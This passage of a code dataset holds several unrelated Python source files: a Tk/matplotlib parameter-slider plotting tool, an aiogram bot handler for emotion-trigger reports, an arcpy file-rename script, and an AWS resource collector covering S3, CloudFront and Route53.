http://stackoverflow.com/questions/7050448/write-image-to-windows-clipboard-in-python-with-pil-and-win32clipboard\n\tdef copy2clipboard(self,event, figure=None):\n\t\tfrom io import BytesIO as StringIO\n\t\tfrom time import sleep\n\t\tfrom PIL import Image\n\t\timport win32clipboard\n\n\t\tif figure:\n\t\t self.fig = figure\n\t \n\t\toutput = StringIO()\n\t\t# fig.savefig(output, format='bmp') # bmp not supported\n\t\tdpi = self.fig.get_dpi()\n\t\tself.fig.set_dpi(self.dpi4fig) \n\t\tself.fig.canvas.draw()\n\t\tbuf = self.fig.canvas.buffer_rgba()\n\t\tw = int(self.fig.get_figwidth() * self.fig.dpi)\n\t\th = int(self.fig.get_figheight() * self.fig.dpi)\n\t\t# im = Image.frombuffer('RGBA', (w,h), buf)\n\t\t# II = im.transpose(Image.FLIP_TOP_BOTTOM).convert(\"RGB\")\n\t\t# II.save(output, \"BMP\") # \"JPEG\")# \n\t\tim = Image.frombuffer('RGBA', (w,h), buf, 'raw', 'RGBA', 0, 1)\n\t\tim.save(output, \"BMP\") # \"JPEG\")#\n\n\t\tdata = output.getvalue()[14:] # The file header off-set of BMP is 14 bytes\n\t\toutput.close()\n\n\t\ttry:\n\t\t win32clipboard.OpenClipboard()\n\t\t win32clipboard.EmptyClipboard()\n\t\t # win32clipboard.SetClipboardData(win32clipboard.CF_BITMAP, data) # did not work!\n\t\t win32clipboard.SetClipboardData(win32clipboard.CF_DIB, data) # DIB = device independent bitmap \n\t\t win32clipboard.CloseClipboard()\n\t\texcept:\n\t\t sleep(0.2)\n\t\t self.copy2clipboard(event, fig)\n\t\tself.fig.set_dpi(dpi) \n\t\tself.fig.canvas.draw()\n\n\tdef a_line(self,x):\n\t\t'''a simple line'''\n\t\treturn x;\t\n\n\tdef coursor_position(self):\t\t\t\n\t\treturn [self.Xc,self.Yc]\n\n\tdef get_manip_axis(self):\n\t\treturn self.fig.gca()\t\n\n\tdef get_manip_frame(self):\n\t\treturn self.fr\n\t\t\n\tdef coursor_position_self(self,event):\t\n\t\tself.Xc, self.Yc = event.xdata, event.ydata \n\t\treturn [self.Xc,self.Yc]\n\n\tdef set_parameter_slider(self,prm_MIN,prm_MAX,prm_VAL,prm_res,prm_name,tickinterval=0):\n\t\tself.prm_tot +=1 \n\t\tself.param[prm_name] = {}\n\t\tself.param[prm_name]['min'] = prm_MIN\n\t\tself.param[prm_name]['max'] = prm_MAX\n\t\tself.param[prm_name]['val'] = prm_VAL\n\t\tself.param[prm_name]['res'] = prm_res\n\t\t\n\t\tself.param[prm_name]['lbl'] = Tk.Label(CManipulator.root, text=prm_name)\n\t\tself.param[prm_name]['lbl'].grid(column=self.prm_tot, row=1, sticky=Tk.S) \n\t\tself.param[prm_name]['min_lbl'] = Tk.Label(CManipulator.root, text=prm_MIN)\n\t\tself.param[prm_name]['min_lbl'].grid(column=self.prm_tot, row=2, sticky=Tk.S) \n\t\tself.param[prm_name]['max_lbl'] = Tk.Label(CManipulator.root, text=prm_MAX)\n\t\tself.param[prm_name]['max_lbl'].grid(column=self.prm_tot, row=25, sticky=Tk.S) \n\t\tself.param[prm_name]['scale'] = Tk.Scale(CManipulator.root, from_=prm_MIN, to=prm_MAX, orient=Tk.VERTICAL, length=450,\n\t\t\tlabel='', resolution=prm_res,showvalue=0,tickinterval=tickinterval)\n\t\tself.param[prm_name]['scale'].set(prm_VAL)\n\t\tself.param[prm_name]['scale'].grid(column=self.prm_tot, row=4, columnspan=1, rowspan=20,padx=5, sticky=Tk.E+Tk.W+Tk.S+Tk.N)\n\t\t\n\t\tself.prm_prev[prm_name] = self.param[prm_name].copy(); \n\t\t# prm_prev[prm_name] = prm_VAL - 1\n\t\tif self.UPDATE_AFTER_RELEASE:\n\t\t\tself.param[prm_name]['scale'].bind(\"\", lambda event: self.update(self.canvas,self.fig))\n\n\t\tself.evaluate_now = True\n\n\tdef update_scale(self,prm_name,prm_MIN=None,prm_MAX=None,prm_res=None,prm_VAL=None): # \n\t\tif prm_MIN:\n\t\t\tself.param[prm_name]['min_lbl']['text'] = '%.3f'%prm_MIN\n\t\t\tif self.param[prm_name]['scale'].get() < prm_MIN:\n\t\t\t\tself.param[prm_name]['scale'].set(prm_MIN)\n\t\t\tself.param[prm_name]['scale'].configure(from_=prm_MIN)\n\t\tif prm_MAX:\n\t\t\tparam[prm_name]['min_lbl']['text'] = '%.3f'%prm_MIN\n\t\t\tparam[prm_name]['scale'].configure(to=prm_MAX)\n\t\tif prm_res:\n\t\t\tparam[prm_name]['scale'].configure(resolution=prm_res)\n\t\tif prm_VAL:\n\t\t\tparam[prm_name]['scale'].set(prm_VAL)\n\n\tdef update(self,canvas,fig):\n\t\tX = self.Xo\n\t\tax = self.fig.gca() # valid for all cases except SELF_PLOT_FUNCTION\n\t\tself.prm_string = ''\n\t\tneed_an_update_this_time = False\n\t\tfor prm_name in self.param.keys():\n\t\t\tself.prm_string += prm_name+'='+str(self.param[prm_name]['scale'].get())+';'\n\t\t\tif self.evaluate_now and (self.prm_prev[prm_name] != self.param[prm_name]['scale'].get()):\n\t\t\t\tself.prm_prev[prm_name] = self.param[prm_name]['scale'].get()\n\t\t\t\tax.clear()\n\t\t\t\tneed_an_update_this_time = True # Some parameters were updated & evaluate_now is valid\n\t\t\t\n\t\tif need_an_update_this_time:\n\t\t\tif self.SELF_PLOT_FUNCTION:\n\t\t\t\t# the self.m_func(ax) is updating the graph. No other inputs to the function\n\t\t\t\t# all the parameters are globals\n\t\t\t\tself.m_func(self.fig) \n\t\t\telse:\n\t\t\t\tif type(self.m_func) is list:\t\t\t\n\t\t\t\t\tif self.grf_title == None:\n\t\t\t\t\t\tif self.m_func[0].__doc__ == None:\n\t\t\t\t\t\t\tself.grf_title = \"Manipulator Ver. %s; Add your title via grf_title parameter.\"%__version__\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.grf_title = self.m_func[0].__doc__\n\n\t\t\t\t\tfor grf in range(len(self.m_func)):\n\t\t\t\t\t\ty = self.m_func[grf](X)\t# X[grf]\n\t\t\t\t\t\tif len(y) == 2:\n\t\t\t\t\t\t\tX,y = y[0], y[1]\n\t\t\t\t\t\tax.plot(X, y,self.grf_stile[min(grf,len(self.grf_stile)-1)], antialiased=self.aliased)\n\t\t\t\t\tax.set_title( self.grf_title+'\\n'+self.prm_string)\n\n\t\t\t\telse:\n\t\t\t\t\tif self.grf_title == None:\n\t\t\t\t\t\tif self.m_func.__doc__ == None:\n\t\t\t\t\t\t\tself.grf_title = \"Manipulator Ver. %s; Add your title via grf_title parameter.\"%__version__\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.grf_title = self.m_func.__doc__\n\n\t\t\t\t\ty = self.m_func(X)\n\t\t\t\t\tif len(y) == 2:\n\t\t\t\t\t\tX,Y = y[0], y[1]\n\t\t\t\t\tgrf = 0\n\t\t\t\t\tax.plot(X, Y,self.grf_stile[min(grf,len(self.grf_stile)-1)], antialiased=self.aliased)\n\t\t\t\t\tax.set_title( self.grf_title+'\\n'+self.prm_string)\n\n\t\t\t\tax.grid(self.grid_on)\n\t\t\t\tif self.xLim[0]:\n\t\t\t\t\tax.set_xlim(self.xLim)\n\t\t\t\tif self.yLim[0]:\n\t\t\t\t\tax.set_ylim(self.yLim)\n\t\t\t\tax.set_xlabel(self.X_label )\n\t\t\t\tax.set_ylabel(self.Y_label )\t\t\t\n \t\n\t\tcanvas.draw()\n\t\tif not CManipulator.UPDATE_AFTER_RELEASE:\n\t\t\t# call update function every 100ms with params *(canvas,self.fig)\n\t\t\tCManipulator.root.after(100, self.update,*(canvas,self.fig)) \n\n\n## Unit TEST ##################################################################\n# if __name__ == '__main__':\n# \tdef bernoulli_map(x):\n# \t\t'''$ X_{N+1} = 2 X_{N}$ mod 1 ''' \n# \t\treturn fmod(2.*x ,1.)\n\n# \tdef same_val(x):\n# \t\treturn x \n\n# \tdef bernoulli_N_iteration(x,N=0):\t\t\n# \t\t'''N iteration of bernoulli map ''' \t\n# \t\tglobal gui\n# \t\tif N == 0:\n# \t\t\tN=gui.param['iter']['scale'].get()\n# \t\txn = np_copy(x)\n# \t\tfor i in range(N):\n# \t\t\ty = bernoulli_map(xn)\n# \t\t\txn = np_copy(y)\n# \t\treturn y\n\n# \tgui = CManipulator()\n\n# \tgui.Xo = arange(0.0, 1.0, 0.001)\n# \tgui.grf_title = '$N_{th}$ iteration of Bernoulli map; '\n# \tgui.X_label = '$X_{ N}$'\n# \tgui.Y_label = '$X_{N+1}$'\n# \tgui.grf_stile =['-b',':r','-']\n# \tgui.set_parameter_slider(prm_MIN=1,prm_MAX=10,prm_VAL=2,prm_res=1,prm_name='iter')\n# \tgui.set_parameter_slider(prm_MIN=-10.,prm_MAX=23.,prm_VAL=0.,prm_res=0.01,prm_name='r')\n# \tgui.m_func = [bernoulli_N_iteration,same_val]\n# \tTk.mainloop()\n\n\n## Updates ########################################################\t\n# \n# - Now all the app is with grid instead of pack geometry method \n# - Object Oriented implementation of Manipulator\n# \n## TBDs ############################################################\t\n# - self.evaluate_now True review\n# - MIT Licence\n# - Status line: \"Ctrl+C for copying figure; Space bar for toggle grid\n# - Settings window","repo_name":"glebkarmi/Manipulator","sub_path":"manipulator.py","file_name":"manipulator.py","file_ext":"py","file_size_in_byte":10258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73239692880","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import Message, ReplyKeyboardRemove\nfrom aiogram.dispatcher.filters import Text, Regexp\n\nfrom services.db_interaction import DB\nfrom services.common import parse_custom_date_period\nfrom states.states import *\nfrom keyboards.trigger_report import *\nfrom keyboards.emotion_report import period_keyboard, custom_period_button\nfrom messages.emotion_report import report_choose_message, custom_period_message, cant_parse_period_message\n\nfrom messages.trigger_report import *\nfrom keyboards.common import *\nfrom handlers.user_start import user_start\nfrom visualization.trigger_report import get_emotion_triggers_report\nimport os\n\n\nasync def set_trigger_report_period(message: Message, db: DB, state: FSMContext):\n await db.log_message(message)\n await state.set_state(TriggersReport.choose_period_for_report)\n if message.text == custom_period_button:\n await message.reply(custom_period_message, reply_markup=ReplyKeyboardRemove(), reply=False)\n else:\n await message.reply(report_choose_message, reply_markup=period_keyboard, reply=False)\n\n\nasync def show_emotions_with_triggers(message: Message, db: DB, state: FSMContext):\n await db.log_message(message)\n try:\n date_first, date_second = parse_custom_date_period(message.text)\n await state.update_data(date_first=str(date_first), date_second=str(date_second))\n available_emotions = await db.get_available_emotions_for_report_period(message.from_id, date_first=date_first,\n date_second=date_second)\n except:\n try:\n days = int(message.text)\n await state.update_data(days_for_report=days)\n available_emotions = await db.get_available_emotions_for_report(message.from_id, days=days)\n except:\n await message.reply(cant_parse_period_message, reply=False)\n return\n if available_emotions is not None:\n await state.set_state(TriggersReport.choose_emotion_for_report)\n await state.update_data(available_emotions=available_emotions)\n keyboard = generate_trigger_report_keyboard(available_emotions)\n await message.reply(choose_emotion_for_report_message, reply_markup=keyboard, reply=False)\n else:\n await message.reply(you_didnt_collect_triggers_message, reply=False)\n await set_trigger_report_period(message, db, state)\n\n\nasync def show_trigger_report(message: Message, db: DB, state: FSMContext):\n await db.log_message(message)\n data = await state.get_data()\n if message.text not in data.get('available_emotions'):\n await message.reply(wrong_emotion_message, reply=False)\n return\n emotion_for_report = message.text\n days = data.get('days_for_report')\n date_first = data.get('date_first')\n date_second = data.get('date_second')\n if date_first is not None and date_second is not None:\n trigger_report = await db.get_triggers_report_period(message.from_id, date_first, date_second, emotion_for_report)\n else:\n trigger_report = await db.get_triggers_report(message.from_id, days, emotion_for_report)\n report = await get_emotion_triggers_report(trigger_report, emotion_for_report, days, date_first, date_second)\n await message.reply_photo(open(report, 'rb'), reply=False, reply_markup=home_keyboard)\n try:\n os.remove(report)\n except:\n pass\n await state.finish()\n\n\n\n\ndef trigger_report_register(dp: Dispatcher):\n dp.register_message_handler(set_trigger_report_period, commands=[\"trigger_report\"], state=\"*\")\n dp.register_message_handler(set_trigger_report_period, Text(equals=triggers_report_button), state=\"*\")\n dp.register_message_handler(set_trigger_report_period, Text(equals=custom_period_button),\n state=TriggersReport.choose_period_for_report)\n dp.register_message_handler(user_start, Text(equals=main_page_button), state=TriggersReport.choose_emotion_for_report)\n dp.register_message_handler(show_emotions_with_triggers, Regexp(regexp='\\d+'), state=TriggersReport.choose_period_for_report)\n dp.register_message_handler(show_trigger_report, state=TriggersReport.choose_emotion_for_report)\n\n\n","repo_name":"MaxSheptyakov/Emphatix","sub_path":"handlers/trigger_report.py","file_name":"trigger_report.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"40380876391","text":"#################################\n#FILE: takehome1.py\n#AUTHOR:Kelsey Herndon\n#EMAIL: keh0023@uah.edu \n#MODIFIED BY: N/A\n#ORGANIZATION: University of Alabama in Huntsville; Department of Atmospheric Science\n#CREATION DATE: 2/22/2017\n#LAST MOD DATE: 2/26/2017\n#PURPOSE: This script adds a desired suffix to a file name\n#DEPENDENCIES: arcpy\n#################################\n\n# Import system modules\nimport arcpy\n\n##Get the variables from ArcMap\n#get the workspace location\nworkspace = arcpy.GetParameterAsText(0) \n#get the original file (to be renamed)\nin_data = arcpy.GetParameterAsText(1)\n#get the desired suffix for the file (note: this is not the file type, for example .tif, .jpeg, etc.)\nsuffix = arcpy.GetParameterAsText(2)\n\n##Define the workspace\narcpy.env.workspace = workspace\n\n##Define the new name of the file \nout_data = in_data[0:-4] + suffix\n\n##Execute Rename\narcpy.Rename_management(in_data, out_data, \"raster\")\n","repo_name":"herndk1/UAHcourse_IntroToPython","sub_path":"HMWRK_AddSuffixToFile_arcpyTool.py","file_name":"HMWRK_AddSuffixToFile_arcpyTool.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13781101913","text":"from collections import defaultdict\n\nfrom botocore.exceptions import ClientError\nfrom datetime import datetime, timedelta\nfrom cloud_inquisitor import get_aws_session\nfrom cloud_inquisitor.config import dbconfig, ConfigOption\nfrom cloud_inquisitor.database import db\nfrom cloud_inquisitor.exceptions import InquisitorError\nfrom cloud_inquisitor.plugins import BaseCollector, CollectorType\nfrom cloud_inquisitor.plugins.types.accounts import AWSAccount\nfrom cloud_inquisitor.plugins.types.resources import S3Bucket, CloudFrontDist, DNSZone, DNSRecord\nfrom cloud_inquisitor.utils import get_resource_id\nfrom cloud_inquisitor.wrappers import retry\n\n\nclass AWSAccountCollector(BaseCollector):\n name = 'AWS Account Collector'\n ns = 'collector_ec2'\n type = CollectorType.AWS_ACCOUNT\n interval = dbconfig.get('interval', ns, 15)\n s3_collection_enabled = dbconfig.get('s3_bucket_collection', ns, True)\n cloudfront_collection_enabled = dbconfig.get('cloudfront_collection', ns, True)\n route53_collection_enabled = dbconfig.get('route53_collection', ns, True)\n\n options = (\n ConfigOption('s3_bucket_collection', True, 'bool', 'Enable S3 Bucket Collection'),\n ConfigOption('cloudfront_collection', True, 'bool', 'Enable Cloudfront DNS Collection'),\n ConfigOption('route53_collection', True, 'bool', 'Enable Route53 DNS Collection'),\n )\n\n def __init__(self, account):\n super().__init__()\n\n if type(account) == str:\n account = AWSAccount.get(account)\n\n if not isinstance(account, AWSAccount):\n raise InquisitorError('The AWS Collector only supports AWS Accounts, got {}'.format(\n account.__class__.__name__\n ))\n\n self.account = account\n self.session = get_aws_session(self.account)\n\n def run(self):\n try:\n if self.s3_collection_enabled:\n self.update_s3buckets()\n\n if self.cloudfront_collection_enabled:\n self.update_cloudfront()\n\n if self.route53_collection_enabled:\n self.update_route53()\n\n except Exception as ex:\n self.log.exception(ex)\n raise\n\n finally:\n del self.session\n\n @retry\n def update_s3buckets(self):\n \"\"\"Update list of S3 Buckets for the account\n\n Returns:\n `None`\n \"\"\"\n self.log.debug('Updating S3Buckets for {}'.format(self.account.account_name))\n s3 = self.session.resource('s3')\n s3c = self.session.client('s3')\n\n try:\n existing_buckets = S3Bucket.get_all(self.account)\n buckets = {bucket.name: bucket for bucket in s3.buckets.all()}\n for data in buckets.values():\n # This section ensures that we handle non-existent or non-accessible sub-resources\n try:\n bucket_region = s3c.get_bucket_location(Bucket=data.name)['LocationConstraint']\n if not bucket_region:\n bucket_region = 'us-east-1'\n\n except ClientError as e:\n self.log.info('Could not get bucket location..bucket possibly removed / {}'.format(e))\n bucket_region = 'unavailable'\n\n try:\n bucket_policy = data.Policy().policy\n\n except ClientError as e:\n if e.response['Error']['Code'] == 'NoSuchBucketPolicy':\n bucket_policy = None\n else:\n self.log.info('There was a problem collecting bucket policy for bucket {} on account {}, {}'\n .format(data.name, self.account, e.response))\n bucket_policy = 'cinq cannot poll'\n\n try:\n website_enabled = 'Enabled' if data.Website().index_document else 'Disabled'\n\n except ClientError as e:\n if e.response['Error']['Code'] == 'NoSuchWebsiteConfiguration':\n website_enabled = 'Disabled'\n else:\n self.log.info('There was a problem collecting website config for bucket {} on account {}'\n .format(data.name, self.account))\n website_enabled = 'cinq cannot poll'\n\n try:\n tags = {t['Key']: t['Value'] for t in data.Tagging().tag_set}\n\n except ClientError:\n tags = {}\n\n try:\n bucket_size = self._get_bucket_statistics(data.name, bucket_region, 'StandardStorage',\n 'BucketSizeBytes', 3)\n\n bucket_obj_count = self._get_bucket_statistics(data.name, bucket_region, 'AllStorageTypes',\n 'NumberOfObjects', 3)\n\n metrics = {'size': bucket_size, 'object_count': bucket_obj_count}\n\n except Exception as e:\n self.log.info('Could not retrieve bucket statistics / {}'.format(e))\n metrics = {'found': False}\n\n properties = {\n 'bucket_policy': bucket_policy,\n 'creation_date': data.creation_date,\n 'location': bucket_region,\n 'website_enabled': website_enabled,\n 'metrics': metrics,\n 'tags': tags\n }\n\n if data.name in existing_buckets:\n bucket = existing_buckets[data.name]\n if bucket.update(data, properties):\n self.log.debug('Change detected for S3Bucket {}/{}'.format(\n self.account.account_name,\n bucket.id\n ))\n bucket.save()\n else:\n # If a bucket has no tags, a boto3 error is thrown. We treat this as an empty tag set\n\n S3Bucket.create(\n data.name,\n account_id=self.account.account_id,\n properties=properties,\n location=bucket_region,\n tags=tags\n )\n self.log.debug('Added new S3Bucket {}/{}'.format(\n self.account.account_name,\n data.name\n ))\n db.session.commit()\n\n bk = set(list(buckets.keys()))\n ebk = set(list(existing_buckets.keys()))\n\n try:\n for resource_id in ebk - bk:\n db.session.delete(existing_buckets[resource_id].resource)\n self.log.debug('Deleted S3Bucket {}/{}'.format(\n self.account.account_name,\n resource_id\n ))\n db.session.commit()\n\n except Exception as e:\n self.log.error(\n 'Could not update the current S3Bucket list for account {}/{}'.format(self.account.account_name, e))\n db.session.rollback()\n\n finally:\n del s3, s3c\n\n @retry\n def update_cloudfront(self):\n \"\"\"Update list of CloudFront Distributions for the account\n\n Returns:\n `None`\n \"\"\"\n self.log.debug('Updating CloudFront distributions for {}'.format(self.account.account_name))\n cfr = self.session.client('cloudfront')\n\n try:\n existing_dists = CloudFrontDist.get_all(self.account, None)\n dists = []\n\n # region Fetch information from API\n # region Web distributions\n done = False\n marker = None\n while not done:\n if marker:\n response = cfr.list_distributions(Marker=marker)\n else:\n response = cfr.list_distributions()\n\n dl = response['DistributionList']\n if dl['IsTruncated']:\n marker = dl['NextMarker']\n else:\n done = True\n\n if 'Items' in dl:\n for dist in dl['Items']:\n origins = []\n for origin in dist['Origins']['Items']:\n if 'S3OriginConfig' in origin:\n origins.append(\n {\n 'type': 's3',\n 'source': origin['DomainName']\n }\n )\n elif 'CustomOriginConfig' in origin:\n origins.append(\n {\n 'type': 'custom-http',\n 'source': origin['DomainName']\n }\n )\n\n data = {\n 'arn': dist['ARN'],\n 'name': dist['DomainName'],\n 'origins': origins,\n 'enabled': dist['Enabled'],\n 'type': 'web',\n 'tags': self.__get_distribution_tags(cfr, dist['ARN'])\n }\n dists.append(data)\n # endregion\n\n # region Streaming distributions\n done = False\n marker = None\n while not done:\n if marker:\n response = cfr.list_streaming_distributions(Marker=marker)\n else:\n response = cfr.list_streaming_distributions()\n\n dl = response['StreamingDistributionList']\n if dl['IsTruncated']:\n marker = dl['NextMarker']\n else:\n done = True\n\n if 'Items' in dl:\n dists += [\n {\n 'arn': x['ARN'],\n 'name': x['DomainName'],\n 'origins': [{'type': 's3', 'source': x['S3Origin']['DomainName']}],\n 'enabled': x['Enabled'],\n 'type': 'rtmp',\n 'tags': self.__get_distribution_tags(cfr, x['ARN'])\n } for x in dl['Items']\n ]\n # endregion\n # endregion\n\n for data in dists:\n if data['arn'] in existing_dists:\n dist = existing_dists[data['arn']]\n if dist.update(data):\n self.log.debug('Updated CloudFrontDist {}/{}'.format(\n self.account.account_name,\n data['name']\n ))\n dist.save()\n\n else:\n properties = {\n 'domain_name': data['name'],\n 'origins': data['origins'],\n 'enabled': data['enabled'],\n 'type': data['type']\n }\n\n CloudFrontDist.create(\n data['arn'],\n account_id=self.account.account_id,\n properties=properties,\n tags=data['tags']\n )\n\n self.log.debug('Added new CloudFrontDist {}/{}'.format(\n self.account.account_name,\n data['name']\n ))\n db.session.commit()\n\n dk = set(x['arn'] for x in dists)\n edk = set(existing_dists.keys())\n\n try:\n for resource_id in edk - dk:\n db.session.delete(existing_dists[resource_id].resource)\n self.log.debug('Deleted CloudFrontDist {}/{}'.format(\n resource_id,\n self.account.account_name\n ))\n db.session.commit()\n except:\n db.session.rollback()\n finally:\n del cfr\n\n @retry\n def update_route53(self):\n \"\"\"Update list of Route53 DNS Zones and their records for the account\n\n Returns:\n `None`\n \"\"\"\n self.log.debug('Updating Route53 information for {}'.format(self.account))\n\n # region Update zones\n existing_zones = DNSZone.get_all(self.account)\n zones = self.__fetch_route53_zones()\n for resource_id, data in zones.items():\n if resource_id in existing_zones:\n zone = DNSZone.get(resource_id)\n if zone.update(data):\n self.log.debug('Change detected for Route53 zone {}/{}'.format(\n self.account,\n zone.name\n ))\n zone.save()\n else:\n tags = data.pop('tags')\n DNSZone.create(\n resource_id,\n account_id=self.account.account_id,\n properties=data,\n tags=tags\n )\n\n self.log.debug('Added Route53 zone {}/{}'.format(\n self.account,\n data['name']\n ))\n\n db.session.commit()\n\n zk = set(zones.keys())\n ezk = set(existing_zones.keys())\n\n for resource_id in ezk - zk:\n zone = existing_zones[resource_id]\n\n db.session.delete(zone.resource)\n self.log.debug('Deleted Route53 zone {}/{}'.format(\n self.account.account_name,\n zone.name.value\n ))\n db.session.commit()\n # endregion\n\n # region Update resource records\n try:\n for zone_id, zone in DNSZone.get_all(self.account).items():\n existing_records = {rec.id: rec for rec in zone.records}\n records = self.__fetch_route53_zone_records(zone.get_property('zone_id').value)\n\n for data in records:\n if data['id'] in existing_records:\n record = existing_records[data['id']]\n if record.update(data):\n self.log.debug('Changed detected for DNSRecord {}/{}/{}'.format(\n self.account,\n zone.name,\n data['name']\n ))\n record.save()\n else:\n record = DNSRecord.create(\n data['id'],\n account_id=self.account.account_id,\n properties={k: v for k, v in data.items() if k != 'id'},\n tags={}\n )\n self.log.debug('Added new DNSRecord {}/{}/{}'.format(\n self.account,\n zone.name,\n data['name']\n ))\n zone.add_record(record)\n db.session.commit()\n\n rk = set(x['id'] for x in records)\n erk = set(existing_records.keys())\n\n for resource_id in erk - rk:\n record = existing_records[resource_id]\n zone.delete_record(record)\n self.log.debug('Deleted Route53 record {}/{}/{}'.format(\n self.account.account_name,\n zone_id,\n record.name\n ))\n db.session.commit()\n except:\n raise\n # endregion\n\n # region Helper functions\n @retry\n def __get_distribution_tags(self, client, arn):\n \"\"\"Returns a dict containing the tags for a CloudFront distribution\n\n Args:\n client (botocore.client.CloudFront): Boto3 CloudFront client object\n arn (str): ARN of the distribution to get tags for\n\n Returns:\n `dict`\n \"\"\"\n return {\n t['Key']: t['Value'] for t in client.list_tags_for_resource(\n Resource=arn\n )['Tags']['Items']\n }\n\n @retry\n def __fetch_route53_zones(self):\n \"\"\"Return a list of all DNS zones hosted in Route53\n\n Returns:\n :obj:`list` of `dict`\n \"\"\"\n done = False\n marker = None\n zones = {}\n route53 = self.session.client('route53')\n\n try:\n while not done:\n if marker:\n response = route53.list_hosted_zones(Marker=marker)\n else:\n response = route53.list_hosted_zones()\n\n if response['IsTruncated']:\n marker = response['NextMarker']\n else:\n done = True\n\n for zone_data in response['HostedZones']:\n zones[get_resource_id('r53z', zone_data['Id'])] = {\n 'name': zone_data['Name'].rstrip('.'),\n 'source': 'AWS/{}'.format(self.account),\n 'comment': zone_data['Config']['Comment'] if 'Comment' in zone_data['Config'] else None,\n 'zone_id': zone_data['Id'],\n 'private_zone': zone_data['Config']['PrivateZone'],\n 'tags': self.__fetch_route53_zone_tags(zone_data['Id'])\n }\n\n return zones\n finally:\n del route53\n\n @retry\n def __fetch_route53_zone_records(self, zone_id):\n \"\"\"Return all resource records for a specific Route53 zone\n\n Args:\n zone_id (`str`): Name / ID of the hosted zone\n\n Returns:\n `dict`\n \"\"\"\n route53 = self.session.client('route53')\n\n done = False\n nextName = nextType = None\n records = {}\n\n try:\n while not done:\n if nextName and nextType:\n response = route53.list_resource_record_sets(\n HostedZoneId=zone_id,\n StartRecordName=nextName,\n StartRecordType=nextType\n )\n else:\n response = route53.list_resource_record_sets(HostedZoneId=zone_id)\n\n if response['IsTruncated']:\n nextName = response['NextRecordName']\n nextType = response['NextRecordType']\n else:\n done = True\n\n if 'ResourceRecordSets' in response:\n for record in response['ResourceRecordSets']:\n # Cannot make this a list, due to a race-condition in the AWS api that might return the same\n # record more than once, so we use a dict instead to ensure that if we get duplicate records\n # we simply just overwrite the one already there with the same info.\n record_id = self._get_resource_hash(zone_id, record)\n if 'AliasTarget' in record:\n value = record['AliasTarget']['DNSName']\n records[record_id] = {\n 'id': record_id,\n 'name': record['Name'].rstrip('.'),\n 'type': 'ALIAS',\n 'ttl': 0,\n 'value': [value]\n }\n else:\n value = [y['Value'] for y in record['ResourceRecords']]\n records[record_id] = {\n 'id': record_id,\n 'name': record['Name'].rstrip('.'),\n 'type': record['Type'],\n 'ttl': record['TTL'],\n 'value': value\n }\n\n return list(records.values())\n finally:\n del route53\n\n @retry\n def __fetch_route53_zone_tags(self, zone_id):\n \"\"\"Return a dict with the tags for the zone\n\n Args:\n zone_id (`str`): ID of the hosted zone\n\n Returns:\n :obj:`dict` of `str`: `str`\n \"\"\"\n route53 = self.session.client('route53')\n\n try:\n return {\n tag['Key']: tag['Value'] for tag in\n route53.list_tags_for_resource(\n ResourceType='hostedzone',\n ResourceId=zone_id.split('/')[-1]\n )['ResourceTagSet']['Tags']\n }\n finally:\n del route53\n\n @staticmethod\n def _get_resource_hash(zone_name, record):\n \"\"\"Returns the last ten digits of the sha256 hash of the combined arguments. Useful for generating unique\n resource IDs\n\n Args:\n zone_name (`str`): The name of the DNS Zone the record belongs to\n record (`dict`): A record dict to generate the hash from\n\n Returns:\n `str`\n \"\"\"\n record_data = defaultdict(int, record)\n if type(record_data['GeoLocation']) == dict:\n record_data['GeoLocation'] = \":\".join([\"{}={}\".format(k, v) for k, v in record_data['GeoLocation'].items()])\n\n args = [\n zone_name,\n record_data['Name'],\n record_data['Type'],\n record_data['Weight'],\n record_data['Region'],\n record_data['GeoLocation'],\n record_data['Failover'],\n record_data['HealthCheckId'],\n record_data['TrafficPolicyInstanceId']\n ]\n\n return get_resource_id('r53r', args)\n\n def _get_bucket_statistics(self, bucket_name, bucket_region, storage_type, statistic, days):\n \"\"\" Returns datapoints from cloudwatch for bucket statistics.\n\n Args:\n bucket_name `(str)`: The name of the bucket\n statistic `(str)`: The statistic you want to fetch from\n days `(int)`: Sample period for the statistic\n\n \"\"\"\n\n cw = self.session.client('cloudwatch', region_name=bucket_region)\n\n # gather cw stats\n\n try:\n obj_stats = cw.get_metric_statistics(\n Namespace='AWS/S3',\n MetricName=statistic,\n Dimensions=[\n {\n 'Name': 'StorageType',\n 'Value': storage_type\n },\n {\n 'Name': 'BucketName',\n 'Value': bucket_name\n }\n ],\n Period=86400,\n StartTime=datetime.utcnow() - timedelta(days=days),\n EndTime=datetime.utcnow(),\n Statistics=[\n 'Average'\n ]\n )\n stat_value = obj_stats['Datapoints'][0]['Average'] if obj_stats['Datapoints'] else 'NO_DATA'\n\n return stat_value\n\n except Exception as e:\n self.log.error(\n 'Could not get bucket statistic for account {} / bucket {} / {}'.format(self.account.account_name,\n bucket_name, e))\n\n finally:\n del cw\n\n # endregion\n","repo_name":"RiotGames/cloud-inquisitor","sub_path":"plugins/public/cinq-collector-aws/cinq_collector_aws/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":23738,"program_lang":"python","lang":"en","doc_type":"code","stars":453,"dataset":"github-code","pt":"3"}
